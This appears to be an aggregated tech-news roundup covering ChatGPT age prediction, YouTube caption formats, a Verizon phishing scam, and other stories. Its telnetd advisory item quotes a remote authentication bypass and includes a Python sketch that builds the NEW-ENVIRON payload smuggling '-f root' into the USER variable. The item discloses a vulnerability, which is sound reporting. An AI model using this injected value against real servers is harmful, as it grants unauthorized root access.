OpenAI is launching age prediction for ChatGPT accounts

OpenAI is the latest company to hop on the bandwagon of gating access by users’ age. The AI business is beginning a global rollout of an age prediction tool to determine whether a user is a minor. “The model looks at a combination of behavioral and account-level signals, including how long an account has existed, typical times of day when someone is active, usage patterns over time, and a user’s stated age,” the company’s announcement states. Anyone ChatGPT incorrectly flags as underage will need to submit a selfie through the Persona age verification platform to correct the mistake.

Most AI companies push new features first, then attempt to layer a patchwork of protections and safety guards on top after those features cause harm. OpenAI was named in a wrongful death suit over a teen who allegedly used ChatGPT to plan his suicide, and only in the months that followed did it begin pondering automatic content restrictions for underage users and launch a mental health advisory council. In this instance, OpenAI is attempting to prepare ahead of time for the launch of an “adult mode” that will allow users to create and consume content that would be dubbed NSFW. Considering how well a similar change has been going over at Roblox, another platform with a shaky history of protecting minors, it seems probable that underage users will find ways to circumvent these tools if they want to use ChatGPT as adults.


Google temporarily disabled YouTube’s advanced captions without warning

YouTubers have been increasingly frustrated with Google’s management of the platform, with disinformation welcomed back and an aggressive push for more AI (except where Google doesn’t like it). So it’s no surprise that creators have been up in arms over the unannounced removal of YouTube’s advanced SRV3 caption format. You don’t have to worry too much just yet: Google says this is only temporary, and it’s working on a fix for the underlying bug.

Google added support for this custom subtitle format around 2018, giving creators far more customization than traditional captions offer. SRV3 (also known as YTT, or YouTube Timed Text) allows custom colors, transparency, animations, fonts, and precise positioning in videos. Uploaders using the format can color-code and position captions to distinguish multiple speakers, create sing-along animations, or style captions to match the video.
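
Google has never published a formal spec for SRV3, so what’s known about the format comes from community reverse-engineering. As a rough illustration only (element and attribute names follow community documentation and may be incomplete), a minimal styled caption file could be generated like this:

    # A minimal SRV3/YTT caption file. Google has never published an
    # official spec, so the element and attribute names below follow
    # community reverse-engineering and may be incomplete.
    srv3 = """<?xml version="1.0" encoding="utf-8"?>
    <timedtext format="3">
      <head>
        <!-- pen 1: pink, bold text for one speaker -->
        <pen id="1" fc="#FF6EC7" b="1"/>
        <!-- window position 1: anchored near the top-left corner -->
        <wp id="1" ap="0" ah="10" av="10"/>
      </head>
      <body>
        <!-- t = start (ms), d = duration (ms); wp/p select position and pen -->
        <p t="1000" d="2500" wp="1" p="1">Speaker one, top-left, in pink</p>
        <p t="4000" d="2500">Speaker two, default bottom-center caption</p>
      </body>
    </timedtext>"""

    with open("captions.srv3", "w", encoding="utf-8") as f:
        f.write(srv3)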

Over the last several days, creators who’ve become accustomed to this level of control have been dismayed to see that YouTube is no longer accepting videos with this Google-created format. Many worried Google had ditched the format entirely, which could be problematic for all those previously uploaded videos.


Scammers Are Targeting Your Verizon Outage Refund

Verizon had a massive outage last week, leaving roughly two million customers’ phones stuck in SOS mode or reliant on Wi-Fi for nearly a day. As an apology for the inconvenience, the company promised to refund those affected a meager $20 to their accounts—so naturally, scammers quickly got a phishing scheme up and running targeting people eligible for the credit. As reported by Android Authority, the Jones County Sheriff’s Office in Georgia has issued an alert about fake Verizon “credit” messages floating around.

Verizon credit phishing scam

According to the sheriff’s office, scammers may contact you via text or email—claiming to be from Verizon—with information about the outage credit. These messages contain phishing links, which may be set up to collect personal information or account credentials, or to deliver malware to your device. Clicking through will likely compromise your data in some way, especially if you enter any details on a malicious website.

If you are a Verizon customer who was affected by the outage, you will receive a text letting you know that your $20 credit is available to claim in the My Verizon app, which is why you may not be immediately suspicious of the scam. Plus, since you do need to claim the funds, you may be swayed by a message that sounds urgent. Don’t fall for it.

In general, you shouldn’t click links in unsolicited communication, and you should be suspicious of any messages that prompt you to click said links, even if they appear to be from a legitimate company about a legitimate matter. As evidenced by this phishing campaign and those like it, scammers can and will impersonate trusted brands and use real events to seem more believable.

Instead, always navigate directly to the app or official website—type in the URL and check it carefully or go through your password manager—and log in using your account credentials. Once logged in, you can see any legitimate communication and take action securely. Know that scammers can easily spoof websites, so if you click a phishing link, you may not realize that you’re on a fake page.

Meta’s Oversight Board Takes Up Permanent Bans In Landmark Case

An anonymous reader quotes a report from TechCrunch: Meta’s Oversight Board is tackling a case focused on Meta’s ability to permanently disable user accounts. Permanent bans are a drastic action, locking people out of their profiles, memories, and friend connections, and, in the case of creators and businesses, their ability to market to and communicate with fans and customers. This is the first time in the Board’s five-year history that permanent account bans have been the subject of its focus, the organization notes.

The case being reviewed isn’t exactly one of an everyday user. Instead, the case involves a high-profile Instagram user who repeatedly violated Meta’s Community Standards by posting visual threats of violence against a female journalist, anti-gay slurs against politicians, content depicting a sex act, allegations of misconduct against minorities, and more. The account had not accumulated enough strikes to be automatically disabled, but Meta made the decision to permanently ban the account. The Board’s materials didn’t name the account in question, but its recommendations could impact others who post content that targets public figures with abuse, harassment, and threats, as well as users who have their accounts permanently banned without receiving transparent explanations.

Meta referred this specific case, which covers five posts made in the year before the account was permanently disabled, to the Board. The Board says it’s looking for input on several key issues: how permanent bans can be processed fairly, the effectiveness of Meta’s current tools for protecting public figures and journalists from repeated abuse and threats of violence, the challenges of identifying off-platform content, whether punitive measures effectively shape online behavior, and best practices for transparent reporting on account enforcement decisions. […] Whether the Oversight Board has any real sway to address issues on Meta’s platform continues to be debated, of course. […] After the Oversight Board issues its policy recommendations to Meta, the company has 60 days to respond. The Board is also soliciting public comments on this topic. The report notes that Meta’s Oversight Board can overturn individual moderation decisions and offer recommendations, but is largely sidelined from the major policy shifts driven by Mark Zuckerberg.



Flesh-eating flies are eating their way through Mexico, CDC warns

The US Centers for Disease Control and Prevention issued a health alert to clinicians Tuesday, warning that the savage, flesh-eating parasitic fly—the New World Screwworm—is not only approaching the Texas border, but also felling an increasing number of animals in the bordering Mexican state of Tamaulipas.

The advisory, released through the agency’s Health Alert Network, directs doctors, veterinarians, and other health workers to be on the lookout for patients with wounds teeming with ferocious maggots burrowing into their living flesh. The alert also provides guidance on what to do if any such festering wounds are encountered—namely, remove each and every maggot to prevent the patient from dying, and, under no circumstances, allow any of the parasites to survive and escape.

The New World Screwworm (NWS) is a fly that lays its eggs—up to 400 at a time—in the wounds, orifices, and mucous membranes of any warm-blooded animal. The eggs hatch into flesh-eating maggots, which look and act much like screws, twisting and boring into their victims while eating them alive.


Ayaneo Konkr Fit Handheld Debuts With 7-Inch OLED And Ryzen AI 9 HX 470

Ayaneo announced Konkr Pocket Fit today, marking the first Windows-based handheld model in Ayaneo’s Konkr sub-brand. While pricing and final storage and memory specifications are unknown due to the ongoing DRAM crisis and NAND shortage, this new OLED-equipped handheld seems set to compete with the OneXFly F1 Pro, but with a slightly souped-up…

ChatGPT Is Getting on the AI Age Verification Bandwagon

When OpenAI first announced GPT-5.2 last month, it quietly disclosed a new safety feature it called “age prediction.” Considering ChatGPT proper isn’t exactly an “all ages” kind of tool, it makes sense that users under the age of 18 should have protections in place to shield them from harmful content. The company says that users who indicate they’re under 18 already receive an altered experience to “reduce exposure to sensitive or potentially harmful content,” but if the user doesn’t voluntarily share how old they are with OpenAI, how does the company enforce these protections? Here’s where age prediction comes in.

How age prediction for ChatGPT works

On Tuesday, OpenAI officially announced its new age prediction policy, which, like other age verification systems being used by the likes of Roblox, uses AI to guess how old a user is. If the system decides that a particular user is under the age of 18, OpenAI will adjust the experience accordingly, with the goal of keeping all interactions age-appropriate.

Here’s how it works: The new age prediction model looks at both the user’s behavior within the app and general account data. That includes things like how old the account is, what times of day the user accesses ChatGPT, usage patterns, and, of course, the age the user says they are. From all this data, the model estimates how old the user likely is. If it thinks they’re over 18, they get the full experience; if it thinks they’re under 18, they get the “safer experience.” If the model isn’t confident either way, it defaults to the safer experience.
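
OpenAI hasn’t published the model, its features, or its thresholds, so as a purely illustrative sketch (every name and number below is invented), the decision rule it describes might look something like this:

    # Illustrative only: OpenAI has not published its model, features,
    # or thresholds. Every name and number here is an invented stand-in.
    def choose_experience(p_minor: float, adult_threshold: float = 0.25) -> str:
        """Map an estimated P(user is a minor) to an experience tier.

        Mirrors the behavior described above: only a confident adult
        prediction unlocks the full experience; a predicted minor or an
        uncertain prediction both fall back to the safer one.
        """
        if p_minor < adult_threshold:
            return "full"
        return "safer"

    print(choose_experience(0.10))  # "full"  -- confidently adult
    print(choose_experience(0.40))  # "safer" -- uncertain, defaults to safer
    print(choose_experience(0.90))  # "safer" -- predicted minor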

What’s restricted in the “safer” version of ChatGPT

That limited experience means ChatGPT will try to reduce the following content types for anyone the model thinks is under 18:

  • Graphic violence or gore

  • Viral challenges that might inspire “risky or harmful behaviors”

  • Role play that is sexual, romantic, or violent in nature

  • Self-harm descriptions

  • Content promoting “extreme” beauty standards, unhealthy dieting, or body shaming

The company says that its approach is informed by “expert input” as well as literature discussing child development science. (It’s not clear how much of that input is from direct interviews and coordination with experts, and how much, if any, is from independent research.) The company also acknowledges “known teen differences in risk perception, impulse control, peer influence, and emotional regulation” when compared to adults.

AI isn’t always great at age prediction

The biggest risk with any of these age prediction models is that they’ll sometimes get it wrong—hallucination is an unfortunate habit all AI models share. That goes both ways: You don’t want someone too young accessing inappropriate content in ChatGPT, but you also don’t want someone older than 18 getting stuck with a limited account for no reason. If you find yourself in the latter situation, OpenAI has a solution for you: direct age verification through Persona. This is the same third-party service Roblox uses for its age verification, which hasn’t gone very well thus far.

That doesn’t necessarily spell doom for OpenAI. Roblox overhauled age verification for a massive user base accustomed to a certain type of multiplayer experience, and the rollout left users unable to chat with others outside their newly assigned age categories, which were often incorrect. ChatGPT’s age prediction, by contrast, only controls the experience of one user at a time, and OpenAI will let you upload a selfie as an added verification step if the prediction model alone isn’t enough. Interestingly, OpenAI doesn’t say anything about the option to upload an ID for verification, which other companies, like Google, have provided.

I’m not necessarily a fan of age prediction models, as I think they often sacrifice user privacy in the name of creating age-appropriate experiences. But there’s little doubt that OpenAI has to do something to limit the full ChatGPT experience for younger users. Many of ChatGPT’s users are under 18, and much of the content they can encounter is wildly inappropriate, whether it’s instructions on getting high or advice on writing suicide notes. In some tragic cases, minors have taken their own lives after discussions with ChatGPT, leading to lawsuits against OpenAI.

I don’t have any great answers here. We’ll just have to see how this new age prediction model affects the user experience for minors and adults alike, and whether it actually manages to create a safer experience for younger, more impressionable users.

Macaque facial gestures are more than just a reflex, study finds

Recent advances in brain-computer interfaces have made it possible to more accurately extract speech from neural signals in humans, but language is just one of the tools we use to communicate. “When my young nephew asks for ice cream before dinner and I say ‘no,’ the meaning is entirely dictated by whether the word is punctuated with a smirk or a stern frown,” says Geena Ianni, a neuroscientist at the University of Pennsylvania. That’s why in the future, she thinks, neural prostheses meant for patients with a stroke or paralysis will decode facial gestures from brain signals in the same way they decode speech.

To lay a foundation for these future facial gesture decoders, Ianni and her colleagues designed an experiment to find out how neural circuitry responsible for making faces really works. “Although in recent years neuroscience got a good handle on how the brain perceives facial expressions, we know relatively little about how they are generated,” Ianni says. And it turned out that a surprisingly large part of what neuroscientists assumed about facial gestures was wrong.

The natural way

For a long time, neuroscientists thought facial gestures in primates stemmed from a neat division of labor in the brain. “Case reports of patients with brain lesions suggested some brain regions were responsible for certain types of emotional expressions while other regions were responsible for volitional movements like speech,” Ianni explains. We’ve developed a clearer picture of speech by tracing the origin of these movements down to the level of individual neurons. But we’ve not done the same for facial expressions. To fill this gap, Ianni and her team designed a study using macaques—social primates that share most of their complex facial musculature with humans.


56% of Companies Have Seen Zero Financial Return From AI Investments, PwC Survey Says

More than half of companies haven’t seen any financial benefit from their AI investments, according to PwC’s latest Global CEO Survey [PDF], and yet the spending shows no signs of slowing down. Some 56% of the 4,454 chief executives surveyed across 95 countries said their companies have realized neither higher revenues nor lower costs from AI over the past year.

Only 12% reported getting both benefits — and those rare winners tend to be the ones who built proper enterprise-wide foundations rather than chasing one-off projects. CEO confidence in near-term growth has taken a notable hit. Just 30% feel strongly optimistic about revenue growth over the next 12 months, down from 38% last year and nowhere near the 56% who felt that way in 2022.



Remote authentication bypass in telnetd

One would assume that most LWN readers stopped running network-accessible telnet services some number of decades ago. For the rest of you, this security advisory from Simon Josefsson is worthy of note:

The telnetd server invokes /usr/bin/login (normally running as root) passing the value of the USER environment variable received from the client as the last parameter.

If the client supplies a carefully crafted USER environment value being the string “-f root”, and passes the telnet(1) -a or --login parameter to send this USER environment to the server, the client will be automatically logged in as root bypassing normal authentication processes.
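
For the curious, the mechanics are easy to see at the byte level. The following sketch (not a working exploit; the surrounding telnet option negotiation is omitted) builds the NEW-ENVIRON subnegotiation that a telnet client sends on behalf of -a/--login, using the byte values from RFC 1572:

    # Byte-level sketch of the NEW-ENVIRON subnegotiation (RFC 1572)
    # that "telnet -a" uses to forward the client's USER variable.
    # Not a working exploit: telnet option negotiation is omitted.
    IAC, SB, SE = 255, 250, 240   # RFC 854 command bytes
    NEW_ENVIRON = 39              # RFC 1572 option code
    IS, VAR, VALUE = 0, 0, 1      # subnegotiation codes

    def environ_payload(user_value: bytes) -> bytes:
        # IAC SB NEW-ENVIRON IS VAR "USER" VALUE <value> IAC SE
        return (bytes([IAC, SB, NEW_ENVIRON, IS, VAR]) + b"USER"
                + bytes([VALUE]) + user_value + bytes([IAC, SE]))

    # A USER value of "-f root" reaches /usr/bin/login as its final
    # argument; login's -f flag means "the user is already
    # authenticated," so no password is ever requested.
    payload = environ_payload(b"-f root")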

Setapp Mobile To Close in February as Alternative iOS App Store Economics Prove Untenable

MacPaw, the Ukraine-based developer, has announced that Setapp Mobile — its alternative iOS app store for European Union users that launched in open beta in September 2024 — will shut down on February 16, 2026, citing “still-evolving and complex business terms” for alternative marketplaces that don’t fit its current business model.

Alternative iOS stores became possible under the Digital Markets Act but face challenges including Apple’s controversial Core Technology Fee, which Epic Games CEO Tim Sweeney has called “ruinous for any hopes of a competing store getting a foothold.”



Anthropic CEO Says Government Should Help Ensure AI’s Economic Upside Is Shared

An anonymous reader shares a report: Anthropic Chief Executive Dario Amodei predicted a future in which AI will spur significant economic growth — but could lead to widespread unemployment and inequality. Amodei is both “excited and worried” about the impact of AI, he said in an interview at Davos Tuesday. “I don’t think there’s an awareness at all of what is coming here and the magnitude of it.”

Anthropic is the developer of the popular chatbot Claude. Amodei said the government will need to play a role in navigating the massive displacement in jobs that could result from advances in AI. He said there could be a future with 5% to 10% GDP growth and 10% unemployment. “That’s not a combination we’ve almost ever seen before,” he said. “There’s gonna need to be some role for government in the displacement that’s this macroeconomically large.”

Amodei painted a potential “nightmare” scenario that AI could bring to society if not properly checked, laying out a future in which 10 million people — 7 million in Silicon Valley and the rest scattered elsewhere — could “decouple” from the rest of society, enjoying as much as 50% GDP growth while others were left behind. “I think this is probably a time to worry less about disincentivizing growth and worry more about making sure that everyone gets a part of that growth,” Amodei said. He noted that was “the opposite of the prevailing sentiment now,” but the reality of technological change will force those ideas to change.

